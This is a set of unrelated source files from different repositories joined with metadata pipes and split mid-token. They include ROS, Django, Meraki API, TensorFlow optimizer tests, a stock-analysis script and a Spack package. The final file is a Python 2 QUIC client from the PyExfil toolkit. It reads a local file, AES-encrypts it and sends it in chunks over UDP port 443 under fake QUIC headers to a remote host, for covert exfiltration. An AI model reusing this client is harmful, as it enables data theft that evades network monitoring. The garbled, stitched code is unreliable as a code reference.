router = TouchRouter(event_pub, default_viewport)
route_topic = '/lg_mirror/{}/active_routes'.format(device_id)
def publish_active_routes(routes):
routes_pub.publish(StringArray(routes))
new_listener_cb = partial(router.handle_new_listener, publish_active_routes)
routes_pub = rospy.Publisher(
| route_topic,
StringArray,
queue_size=10,
subscriber_listener=SubscribeListener(new_listener_cb)
)
# Hacky callback to parse the initial scene.
def h | andle_initial_scene_msg(msg):
d = load_director_message(msg)
router.handle_scene(publish_active_routes, d)
handle_initial_state(handle_initial_scene_msg)
rospy.Service(route_topic, TouchRoutes, router.handle_service_request)
scene_cb = partial(router.handle_scene, publish_active_routes)
on_new_scene(scene_cb)
rospy.Subscriber('/touchscreen/toggle', Bool, router.handle_touchmenu_state, queue_size=100)
rospy.Subscriber(f'/lg_mirror/{device_id}/raw_events', EvdevEvents, router.handle_touch_event, queue_size=100)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
|
django-bmf/django-bmf | djangobmf/contrib/location/serializers.py | Python | bsd-3-clause | 507 | 0 | #!/usr/bin/python
# ex:set fileencoding=utf-8:
from __future__ import unicode_literals
from djangobmf.serializers import ModuleSerializer
from rest_framework import serializers
class WarehouseSerial | izer(ModuleSerializer):
class Meta:
fields = (
'name',
)
cla | ss LocationSerializer(ModuleSerializer):
warehouse_name = serializers.ReadOnlyField(source='warehouse.name')
class Meta:
fields = (
'name',
'warehouse_name',
)
|
joshand/CICO | cico_meraki.py | Python | mit | 16,220 | 0.004747 | import requests
# https://github.com/kennethreitz/grequests/issues/103
from gevent import monkey
def stub(*args, **kwargs): # pylint: disable=unused-argument
pass
monkey.patch_all = stub
import grequests
import os
import json
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
meraki_api_token = os.getenv("MERAKI_API_TOKEN")
meraki_org = os.getenv("MERAKI_ORG")
meraki_dashboard_map = os.getenv("MERAKI_DASHBOARD_MAP")
header = {"X-Cisco-Meraki-API-Key": meraki_api_token}
def get_meraki_networks():
# Get a list of all networks associated with the specified organization
url = "https://dashboard.meraki.com/api/v0/organizations/" + meraki_org + "/networks"
netlist = requests.get(url, headers=header)
netjson = json.loads(netlist.content.decode("utf-8"))
return netjson
def meraki_create_dashboard_link(linktype, linkname, displayval, urlappend, linknameid):
shownet = displayval
if meraki_dashboard_map:
mapjson = json.loads(meraki_dashboard_map.replace("'", '"'))
if linktype in mapjson:
if linkname in mapjson[linktype]:
shownet = "<a href='" + mapjson[linktype][linkname]["baseurl"] + urlappend + "'>" + displayval + "</a>"
if shownet == displayval and linktype == "devices" and linknameid == 0:
shownet = "<a href='https://dashboard.meraki.com/manage/nodes/show/" + linkname + "'>" + displayval + "</a>"
return shownet
def meraki_dashboard_client_mod(netlink, cliid, clidesc):
showcli = clidesc
if netlink:
if netlink.find("/manage") >= 0:
showcli = netlink.split("/manage")[0] + "/manage/usage/list#c=" + cliid + "'>" + clidesc + "</a>"
else:
showcli = "<a href='https://dashboard.meraki.com/manage/usage/list#c=" + cliid + "'>" + clidesc + "</a>"
return showcli
def collect_url_list(jsondata, baseurl, attr1, attr2, battr1, battr2):
# Iterates the jsondata list/dictionary and pulls out attributes to generate a list of URLs
# jsondata : list of dictionaries or dictionary of lists
# baseurl : base url to use. place a $1 to show where to substitute
# attr1 : when using a list of dictionaries, this is the key that will be retrieved from each dict in the list
# when using a dictionary of lists, this is the key where all of the lists will be found
# attr2 : (optional) pass "" to disable
# when using a dictionary of lists, this is the key that will be retrieved from each dict in each list
# These are both optional, and used if a second substitution is needed ($2)
# battr1 : (optional) when using a list of dictionaries, this is the key that will be retrieved from each dict
# in the list when using a dictionary of lists, this is the key where all of the lists will be found
# battr2 : (optional) pass "" to disable
# when using a dictionary of lists, this is the key that will be retrieved from each dict in each list
urllist = []
sub1 = ""
for jsonitem in jsondata:
if attr2 == "":
if attr1 in jsonitem:
urllist.append(baseurl.replace("$1", jsonitem[attr1]))
else:
if attr1 in jsondata[jsonitem]:
for jsonitem2 in jsondata[jsonitem][attr1]:
if isinstance(jsonitem2, str):
if jsonitem2 == attr2:
if battr1 == "":
urllist.append(baseurl.replace("$1", jsondata[jsonitem][attr1][jsonitem2]))
else:
sub1 = jsondata[jsonitem][attr1][jsonitem2]
else:
if battr1 == "":
urllist.append(baseurl.replace("$1", jsonitem2[attr2]))
else:
sub1 = jsonitem2[attr2]
if battr1 in jsondata[jsonitem]:
for jsonitem2 in jsondata[jsonitem][battr1]:
if isinstance(jsonitem2, str):
if jsonitem2 == battr2:
urllist.append(baseurl.replace("$1", sub1).replace("$2", jsondata[jsonitem][battr1][jsonitem2]))
else:
urllist.append(baseurl.replace("$1", sub1).replace("$2", jsonitem2[battr2]))
return urllist
def do_multi_get(url_list, comp_list, comp_id1, comp_id2, comp_url_idx, comp_key, content_key):
# Issues multiple GET requests to a list of URLs. Also will join dictionaries together based on returned content.
# url_list : list of URLs to issue GET requests to
# comp_list : (optional) pass [] to disable
# used to join the results of the GET operations to an existing dictionary
# comp_id1 : when using a list of dictionaries, this is the key to retrieve from each dict in the list
# when using a dictionary of lists, this is the key where all of the lists will be found
# comp_id2 : (optional) pass "" to disable
# when using a dictionary of lists, this is key that will be retrieved from each dict in each list
# comp_url_idx : (optional) pass -1 to disable
# when merging dictionaries, they can be merged either on a URL comparision or a matching key. Use
# this to specify that they be merged based on this specific index in the URL. So to match
# 'b' in http://a.com/b, you would specify 3 here, as that is the 3rd // section in the URL
# comp_key : (optional) pass "" to disable
# when merging dictionaries, they can be merged either on a URL comparision or a matching key. Use
# this to specify that they be merged based on this key found in the content coming back from the
# GET requests
# content_key : (optional when not merging, required when merging) pass "" to disable
# this is the base key added to the merged dictionary for the merged data
s = requests.Session()
retries = Retry(total=5, backoff_factor=0.2, status_forcelist=[403, 500, 502, 503, 504], raise_on_redirect=True,
raise_on_status=True)
s.mount('http://', HTTPAdapter(max_retries=retries))
s.mount('https://', HTTPAdapter(max_retries=retries))
rs = (grequests.get(u, headers=header, session=s) for u in url_list)
content_dict = {}
for itemlist in grequests.imap(rs, stream=False):
icontent = itemlist.content.decode("utf-8")
inlist = json.loads(icontent)
if len(inlist) > 0:
# Use the URL index if it was specified, otherwise use the comparision key
if comp_url_idx >= 0:
urllist = itemlist.url.split("/")
matchval = urllist[comp_url_idx]
else:
matchval = inlist[0][comp_key]
if len(comp_list) > 0:
# comp_list was passed, iterate and merge dictionaries
for net in comp_list:
if comp_id2 == "":
# this is a list of dictionaries. if this matches the search, add it to the content dict
i | f matchval == net[comp_id1]:
kid1 = net["id"]
if kid1 not in content_dict:
content_dict[kid1] = {}
content_dict[kid1]["info"] = net
| content_dict[kid1][content_key] = inlist
break
else:
# this is a dictionary of lists. if the match is present in this dictionary, continue parsing
if matchval in json.dumps(comp_list[net][comp_id1]):
kid1 = comp_list[net]["info"]["id"]
for net2 in comp_list[net][comp_id1]:
kid2 = net2["serial"]
if comp_id2 in net2:
|
ywangd/stash | lib/mlpatches/tests/sp_test.py | Python | mit | 1,266 | 0 | # -*- coding: utf-8 -*-
"""subprocess tests."""
from __future__ import print_function
import subprocess
_stash = globals()["_stash"]
text = _stash.text_color
# exit test
print(text("starting exit test...", "yellow"))
try:
subprocess.check_call("exit 0")
print(text(" 0 OK", "green"))
except subprocess.CalledProcessError:
print(text(" 0 ERROR", "red"))
try:
subprocess.check_call("exit 1")
print(text(" 1 ERROR", "red"))
except subprocess.CalledProcessError:
prin | t(text(" 1 OK", "green"))
# parent I/O
print(text("\nstarting parent I/O test...", "yellow"))
print(" please check for I/O")
subprocess.call("man readme")
# output test
print(text("\nstarting check_output test...", "yellow"))
string = "Test"
try:
output = subprocess.check_output("echo " + string)
if output.endswith("\n") and (not string.endswith("\n")):
output = output[:-1]
if output != string:
print(text(" 0 ERROR output does not match!\n " + output, "red | "))
else:
print(text(" 0 OK", "green"))
except subprocess.CalledProcessError:
print(text(" 0 ERROR", "red"))
try:
output = subprocess.check_output("gci wasd")
print(text(" 1 ERROR", "red"))
except subprocess.CalledProcessError:
print(text(" 1 OK", "green"))
|
yudingding6197/fin_script | debug/recover/s7_try_recover.py | Python | gpl-2.0 | 12,051 | 0.047465 | #!/usr/bin/env python
# -*- coding:gbk -*-
import sys
import re
import os
import string
import datetime
import platform
import shutil
import getopt
import pandas as pd
sys.path.append('.')
from internal.handle_realtm import *
from internal.common_inf import *
from internal.realtime_obj import *
from internal.output_general import *
from internal.analyze_realtime import *
from internal.inf_juchao.parse_jc_tips import *
#from internal.update_tday_db import *
#from internal.compare_realtime import *
#from internal.tingfupai import *
#from internal.common_inf import *
class Logger_IO(object):
def __init__(self, filename="Default.log"):
self.terminal = sys.stdout
self.log = open(filename, "w")
def write(self, message):
self.terminal.write(message)
self.log.write(message)
def flush(self):
self.log.flush()
pass
#¿ÉÒÔºÍshow_dt_info ºÏ²¢, ͨ¹ý desc in ['DT','ZT']½øÐÐÅжÏ
def show_zt_info(zt_list, desc, fmt, outstr, pconfig):
number = len(zt_list)
endstr = ''
if number<=0:
return
elif pconfig['NotAllInfo']==0:
number = 10000
elif number>30:
number = 30
if desc=="ZTHL":
number = 10
endstr = '......'
print outstr
df = pd.DataFrame(zt_list)
if pconfig['SortByTime']==1:
if desc=="ZT":
df = df.sort_values([9,7], 0, True)
elif desc=="ZTHL":
df = df.sort_values([9,7], 0, True)
else:
df = df.sort_values([7], 0, True)
else:
if desc=="ZT":
df = df.sort_values([7,9], 0, [False,True])
elif desc=="YZZT":
df = df.sort_values([7], 0, False)
elif desc=="ZTHL":
df = df.sort_values([2,7], 0, False)
i = 1
for index,itm_lst in df.iterrows():
#str = "%2d %6s %-7s %8.2f %8.2f %8.2f %8.2f %8.2f %4d" % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7])
cxFlag = ''
if itm_lst[8]<CX_DAYS:
cxFlag='CX'
if desc=="YZZT":
str = fmt % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7],cxFlag)
elif desc=="ZT":
cxFlag += ' ' + itm_lst[10]
str = fmt % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7],cxFlag,itm_lst[9])
elif desc=="ZTHL":
cxFlag += ' ' + itm_lst[11]
str = fmt % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7],cxFlag,itm_lst[9],itm_lst[10])
if isinstance(str, unicode): str = str.encode('gbk')
print str
i += 1
if i>number:
break
print endstr
def show_dt_info(dt_list, desc, fmt, pconfig):
number = len(dt_list)
endstr = ''
str = "%s [%d]:" % (desc, number)
if number<=0:
return
elif pconfig['NotAllInfo']==0:
number = 10000
elif number>30:
number = 30
endstr = '......'
df = pd.DataFrame(dt_list)
if pconfig['SortByTime']==1:
if desc=="DT":
df = df.sort_values([9,7], 0, True)
elif desc=="DTFT":
df = df.sort_values([9,7], 0, True)
else:
df = df.sort_values([7], 0, True)
else:
if desc=="DT":
df = df.sort_values([7,9], 0, [False,True])
elif desc=="YZDT":
df = df.sort_values([7], 0, False)
elif desc=="DTFT":
df = df.sort_values([2,7], 0, False)
i = 1
if isinstance(str, unicode): str = str.encode('gbk')
print str
for index,itm_lst in df.iterrows():
cxFlag = ''
if itm_lst[8]<CX_DAYS:
cxFlag='CX'
if desc=="YZDT":
str = fmt % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7],cxFlag)
elif desc=="DT":
cxFlag += ' ' + itm_lst[10]
str = fmt % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7],cxFlag,itm_lst[9])
elif desc=="DTFT":
cxFlag += ' ' + itm_lst[11]
str = fmt % (i,itm_lst[0],itm_lst[1],itm_lst[2],itm_lst[3],itm_lst[4],itm_lst[5],itm_lst[6],itm_lst[7],cxFlag,itm_lst[9],itm_lst[10])
if isinstance(str, unicode): str = str.encode('gbk')
print str
i += 1
if i>number:
break
print endstr
#fmt1 = "%2d %6s %-7s %8.2f %8.2f %8.2f %8.2f %8.2f %4d %3s"
def show_tuishi_info(tuis_list, fmt):
number=len(tuis_list)
desc = "TUISHI [%d]"%(number)
print desc
for i in range(len(tuis_list)):
props = tuis_list[i]
#print props
high = round(float(props[11]),2)
low = round(float(props[12]),2)
open = round(float(props[10]),2)
price = round(float | (props[3]),2)
pre_close = round(float(props[9]),2)
volume = int(props[8])
o_percent = (open-pre_close)*100/pre_close
c_percent = (price-pre_clos | e)*100/pre_close
h_percent = (high-pre_close)*100/pre_close
l_percent = (low-pre_close)*100/pre_close
open_percent = spc_round2(o_percent,2)
change_percent = spc_round2(c_percent,2)
high_zf_percent = spc_round2(h_percent,2)
low_df_percent = spc_round2(l_percent,2)
stk_list = [0, 0]
count = 0
stat = ''
if high==low:
if price>pre_close:
count = get_zf_days(props[1], 1, trade_date, 1, stk_list)
stat = 'YZZT'
else:
count = get_zf_days(props[1], 2, trade_date, 1, stk_list)
stat = 'YZDT'
desc = fmt % (i+1,props[1],props[2],change_percent,price,o_percent,high_zf_percent,low_df_percent,count,stat)
print desc.encode('gbk')
print ""
def filter_dtft(dtft_list, perc):
if len(dtft_list)==0:
return 0
count = 0
for item in dtft_list:
if item[2]>perc:
#print item[0],item[2]
count += 1
return count
def handle_argument():
optlist, args = getopt.getopt(sys.argv[1:], 'htld:')
for option, value in optlist:
if option in ["-h","--help"]:
param_config["Help"] = 1
elif option in ["-d","--date"]:
param_config["Date"] = value
elif option in ["-t","--time"]:
param_config["SortByTime"] = 1
elif option in ["-l","--nolog"]:
param_config["NoLog"] = 1
#print param_config
param_config = {
"Help":0,
"Date":'',
"NoLog":0,
"NoDetail":0,
"NotAllInfo":0,
"SortByTime":0,
"TuiShi":0,
}
REAL_PRE_FD = "../data/"
#Main Start:
if __name__=='__main__':
beginTm = datetime.datetime.now()
sysstr = platform.system()
flname = REAL_PRE_FD + "realtime.txt"
#TODO: open the comment
if os.path.isfile(flname):
os.remove(flname)
sys.stdout = Logger_IO(flname)
handle_argument()
if param_config["Help"]==1 or param_config["Date"]=='':
print("%s -d([.][YYYY]MMDD))"%(os.path.basename(__file__)))
exit(0)
ret, his_date = parseDate2(param_config["Date"])
if ret==-1:
exit(0)
t_fmt = '%s %02d:%02d'
fmt_time = t_fmt %(his_date, beginTm.hour, beginTm.minute)
print "TIME:",fmt_time
updPath = '../data/daily/' + his_date +"/"+ his_date + "up_nm.txt"
updFile = open(updPath, "r")
hisLists = json.load(updFile, encoding='gbk')
updFile.close()
jc_dict = {}
read_tfp_fh_in_tips(his_date, jc_dict)
show_idx = ['000001', '399001', '399005', '399006','399678']
show_real_index(show_idx)
print his_date
stcsItem=statisticsItem()
pre_date = get_preday(1, his_date)
preStatItem = statisticsItem()
ret = parse_realtime_his_file(pre_date, preStatItem)
if ret == -1:
print("Error:No find matched item", pre_date)
exit(0)
#print(preStatItem.lst_non_yzcx_yzzt)
st_dict = {}
st_dict['fup_stk'] = jc_dict['fupai']
st_dict['new_stk'] = jc_dict['newmrk']
st_dict['all_stk'] = hisLists
st_dict['nkb_stk'] = []
st_dict['tui_stk'] = []
today_open = []
collect_all_stock_data_pre(st_dict, today_open, stcsItem, preStatItem, his_date)
non_cx_yz = len(stcsItem.lst_non_yzcx_yzzt)
cx_yz = stcsItem.s_yzzt-non_cx_yz
#»ñÈ¡Êý¾Ý½øÐдòÓ¡
str_opn = "[%d %d %d %d] %3d ÉÏ,%3d ÏÂ" % (stcsItem.s_open_zt,stcsItem.s_close_zt,stcsItem.s_open_T_zt,stcsItem.s_dk_zt, stcsItem.s_sw_zt, stcsItem.s_xw_zt)
if sysstr == "Linux":
str_opn = str_opn.decode('gbk').encode('utf-8')
str_dt = "%d DTKP" % (stcsItem.s_open_dt)
if stcsItem.s_yzdt>0:
str_dt = "%s, %d YZDT" % (str_dt, stcsItem.s_yzdt)
if stcsItem.s_open_dt_dk>0:
str_dt = "%s, %d DTDK" % (str_dt, stcsItem.s_open_dt_dk)
DaoT = stcsItem.s_open_dt-stcsItem.s_yzdt-stcsItem.s_open_dt_dk
if DaoT>0:
str_dt = "%s, %d DaoT " % (str_dt, DaoT)
print " ST(%d ZT %d DT) %s" % (stcsItem.s_st_yzzt, stcsItem.s_st_yzdt, str_dt)
#print " ST(%d ZT %d DT) DTKP:%d YZDT:%d DTDK:%d" % (stcsItem.s_st_yzzt, stcsItem.s_st_yzdt, stcsItem.s_open_dt, stcsItem.s_yzdt,stcsItem.s_open_dt_dk)
dtft_qiang = filter_dtft(stcsItem.lst_dtft, -3)
print "%4 |
iulian787/spack | var/spack/repos/builtin/packages/r-combinat/package.py | Python | lgpl-2.1 | 598 | 0.003344 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. S | ee the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RCombinat(RPackage):
"""routines for combinatorics"""
homepage = "https://cloud.r-project.org/pa | ckage=combinat"
url = "https://cloud.r-project.org/src/contrib/combinat_0.0-8.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/combinat/"
version('0.0-8', sha256='1513cf6b6ed74865bfdd9f8ca58feae12b62f38965d1a32c6130bef810ca30c1')
|
ZhangXinNan/tensorflow | tensorflow/contrib/optimizer_v2/rmsprop_test.py | Python | apache-2.0 | 18,899 | 0.010635 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rmsprop optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import math
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib.optimizer_v2 import rmsprop
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
_DATA_TYPES = [dtypes.half, dtypes.float32]
_TEST_PARAM_VALUES = [
# learning_rate, decay, momentum, epsilon, centered, use_resource
[0.5, 0.9, 0.0, 1.0, True, False],
[0.5, 0.9, 0.0, 1.0, False, False],
[0.5, 0.9, 0.0, 1.0, True, True],
[0.5, 0.9, 0.0, 1.0, False, True],
[0.1, 0.9, 0.0, 1.0, True, False],
[0.5, 0.95, 0.0, 1.0, False, False],
[0.5, 0.8, 0.0, 1e-3, True, False],
[0.5, 0.8, 0.9, 1e-3, True, False],
]
class RMSPropOptimizerTest(test.TestCase, parameterized.TestCase):
def _rmsprop_update_numpy(self, var, g, mg, rms, mom, lr, decay, momentum,
centered):
rms_t = rms * decay + (1 - decay) * g * g
if centered:
mg_t = mg * decay + (1 - decay) * g
denom_t = rms_t - mg_t * mg_t
else:
mg_t = mg
denom_t = rms_t
mom_t = momentum * mom + lr * g / np.sqrt(denom_t, dtype=denom_t.dtype)
var_t = var - mom_t
return var_t, mg_t, rms_t, mom_t
def _sparse_rmsprop_update_numpy(self, var, gindexs, gvalues, mg, rms, mom,
lr, decay, momentum, centered):
mg_t = copy.deepcopy(mg)
rms_t = copy.deepcopy(rms)
mom_t = copy.deepcopy(mom)
var_t = copy.deepcopy(var)
for i in range(len(gindexs)):
gindex = gindexs[i]
gvalue = gvalues[i]
rms_t[gindex] = rms[gindex] * decay + (1 - decay) * gvalue * gvalue
denom_t = rms_t[gindex]
if centered:
mg_t[gindex] = mg_t[gindex] * decay + (1 - decay) * gvalue
denom_t -= mg_t[gindex] * mg_t[gindex]
mom_t[gindex] = momentum * mom[gindex] + lr * gvalue / np.sqrt(denom_t)
var_t[gindex] = var[gindex] - mom_t[gindex]
return var_t, mg_t, rms_t, mom_t
@parameterized.named_parameters(
*test_util.generate_combinations_with_testcase_name(
dtype=_DATA_TYPES, param_value=_TEST_PARAM_VALUES))
def testDense(self, dtype, param_value):
(learning_rate, decay, momentum, epsilon, centered, use_resource) = tuple(
param_value)
with self.test_session(use_gpu=True):
# Initialize variables for numpy implementation.
var0_np = np.array([1.0, 2.0], dtype=dtype.as_numpy_dtype)
grads0_np = np.array([0.1, 0.2], dtype=dtype.as_numpy_dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype.as_numpy_dtype)
grads1_np = np.array([0.01, 0.2], dt | ype=dtype.as_numpy_dtype)
if use_resource:
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
else:
var0 = variables.Variable(var0_np)
var1 = variables.Variable(var1_np)
grads0 = constant_op.constant(grads0_np)
grads1 = constant_op.constant(grads1_np)
opt = rmsprop.RMSPropOptimizer(
learning_rate=learning_rate,
decay=de | cay,
momentum=momentum,
epsilon=epsilon,
centered=centered)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
mg0 = opt.get_slot(var0, "mg")
self.assertEqual(mg0 is not None, centered)
mg1 = opt.get_slot(var1, "mg")
self.assertEqual(mg1 is not None, centered)
rms0 = opt.get_slot(var0, "rms")
self.assertIsNotNone(rms0)
rms1 = opt.get_slot(var1, "rms")
self.assertIsNotNone(rms1)
mom0 = opt.get_slot(var0, "momentum")
self.assertIsNotNone(mom0)
mom1 = opt.get_slot(var1, "momentum")
self.assertIsNotNone(mom1)
mg0_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
mg1_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
rms0_np = np.array([epsilon, epsilon], dtype=dtype.as_numpy_dtype)
rms1_np = np.array([epsilon, epsilon], dtype=dtype.as_numpy_dtype)
mom0_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
mom1_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Run 4 steps of RMSProp
for _ in range(4):
update.run()
var0_np, mg0_np, rms0_np, mom0_np = self._rmsprop_update_numpy(
var0_np, grads0_np, mg0_np, rms0_np, mom0_np, learning_rate,
decay, momentum, centered)
var1_np, mg1_np, rms1_np, mom1_np = self._rmsprop_update_numpy(
var1_np, grads1_np, mg1_np, rms1_np, mom1_np, learning_rate,
decay, momentum, centered)
# Validate updated params
if centered:
self.assertAllCloseAccordingToType(mg0_np, mg0.eval())
self.assertAllCloseAccordingToType(mg1_np, mg1.eval())
self.assertAllCloseAccordingToType(rms0_np, rms0.eval())
self.assertAllCloseAccordingToType(rms1_np, rms1.eval())
self.assertAllCloseAccordingToType(mom0_np, mom0.eval())
self.assertAllCloseAccordingToType(mom1_np, mom1.eval())
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
@parameterized.parameters([dtypes.float32, dtypes.float64])
def testMinimizeSparseResourceVariable(self, dtype):
with self.test_session():
var0 = resource_variable_ops.ResourceVariable([[1.0, 2.0]], dtype=dtype)
x = constant_op.constant([[4.0], [5.0]], dtype=dtype)
pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x)
loss = pred * pred
sgd_op = rmsprop.RMSPropOptimizer(
learning_rate=1.0,
decay=0.0,
momentum=0.0,
epsilon=0.0,
centered=False).minimize(loss)
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllCloseAccordingToType([[1.0, 2.0]], var0.eval())
# Run 1 step of sgd
sgd_op.run()
# Validate updated params
self.assertAllCloseAccordingToType(
[[0., 1.]], var0.eval(), atol=0.01)
@parameterized.parameters([dtypes.float32, dtypes.float64])
def testMinimizeSparseResourceVariableCentered(self, dtype):
with self.test_session():
var0 = resource_variable_ops.ResourceVariable([[1.0, 2.0]], dtype=dtype)
x = constant_op.constant([[4.0], [5.0]], dtype=dtype)
pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x)
loss = pred * pred
sgd_op = rmsprop.RMSPropOptimizer(
learning_rate=1.0,
decay=0.1,
momentum=0.0,
epsilon=1.0,
centered=True).minimize(loss)
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllCloseAccordingToType([[1.0, 2.0]], var0.eval())
# Run 1 step of sgd
sgd_op.run( |
antoinecarme/pyaf | tests/artificial/transf_Quantization/trend_LinearTrend/cycle_5/ar_/test_artificial_128_Quantization_LinearTrend_5__100.py | Python | bsd-3-clause | 270 | 0.085185 | import py | af.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "LinearTrend | ", cycle_length = 5, transform = "Quantization", sigma = 0.0, exog_count = 100, ar_order = 0); |
ytisf/PyExfil | pyexfil/network/QUIC/quic_client.py | Python | mit | 6,330 | 0.004265 |
import sys
import time
import socket
import struct
import random
import hashlib
import urllib2
from Crypto import Random
from Crypto.Cipher import AES
# from itertools import izip_longest
# Setting timeout so that we won't wait forever
timeout = 2
socket.setdefaulttimeout(timeout)
limit = 256*256*256*256 - 1
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def chunkstring(s, n):
return [ s[i:i+n] for i in xrange(0, len(s), n) ]
class AESCipher(object):
def __init__(self, key):
self.bs = 32
self.key = hashlib.sha256(key.encode()).digest()
def encrypt(self, raw):
raw = self._pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return iv + cipher.encrypt(raw)
def decrypt(self, enc):
# enc = base64.b64decode(enc)
iv = enc[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s)-1:])]
class QUICClient():
def __init__(self, host, key, port=443, max_size=4096):
# Params for all class
self.host = host
self.port = port
self.max_size = max_size - 60
self.AESDriver = AESCipher(key=key)
self.serv_addr = (host, port)
# Class Globals
self.max_packets = 255 # Limitation by QUIC itself.
self._genSeq() # QUIC Sequence is used to know that this is the same sequence,
# and it's a 20 byte long that is kept the same through out the
# session and is transfered hex encoded.
self.delay = 0.1
self.sock = None
if self._createSocket() is 1: # Creating a UDP socket object
sys.exit(1)
self.serv_addr = (self.host, self.port) # Creating socket addr format
def _genSeq(self):
self.raw_sequence = random.getrandbits(64)
parts = []
while self.raw_sequence:
parts.append(self.raw_sequence & limit)
self.raw_sequence >>= 32
self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
# struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4')
return 0
def _createSocket(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock = sock
return 0
except socket.error as e:
sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e)
return 1
def _getQUICHeader(self, count):
if type(count) is not hex:
try:
count_id = chr(count)
except:
sys.stderr.write("Count must be int or hex.\n")
return 1
else:
count_id = count
if count > self.max_packets:
sys.stderr.write("[-]\tCount must be maximum | of 255.\n")
return 1
header = "\x0c" # Public Flags
header += self.sequence # Adding CID
header += count_id # Packet Count
return header
def _getFileContent(self, file_path):
try:
f = open(file_path, 'rb')
d | ata = f.read()
f.close()
sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path)
return data
except IOError, e:
sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e))
return 1
def sendFile(self, file_path):
# Get File content
data = self._getFileContent(file_path)
if data == 1:
return 1
# Check that the file is not too big.
if len(data) > (self.max_packets * self.max_size):
sys.stderr.write("[!]\tFile is too big for export.\n")
return 1
# If the file is not too big, start exfiltration
# Exfiltrate first packet
md5_sum = md5(file_path) # Get MD5 sum of file
packets_count = (len(data) / self.max_size)+1 # Total packets
first_packet = self._getQUICHeader(count=0) # Get header for first file
r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count) # First header
r_data = self.AESDriver.encrypt(r_data) # Encrypt data
self.sock.sendto(first_packet + r_data, self.serv_addr) # Send the data
sys.stdout.write("[+]\tSent initiation packet.\n")
# encrypted_content = self.AESDriver.encrypt(data)
# Encrypt the Chunks
raw_dat = ""
chunks = []
while data:
raw_dat += data[:self.max_size]
enc_chunk = self.AESDriver.encrypt(data[:self.max_size])
print len(enc_chunk)
chunks.append(enc_chunk)
data = data[self.max_size:]
i = 1
for chunk in chunks:
this_data = self._getQUICHeader(count=i)
this_data += chunk
self.sock.sendto(this_data, self.serv_addr)
time.sleep(self.delay)
sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count))
i += 1
sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port))
# self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
return 0
def close(self):
time.sleep(0.1)
self.sock.close()
return 0
if __name__ == "__main__":
client = QUICClient(host='127.0.0.1', key="123", port=443) # Setup a server
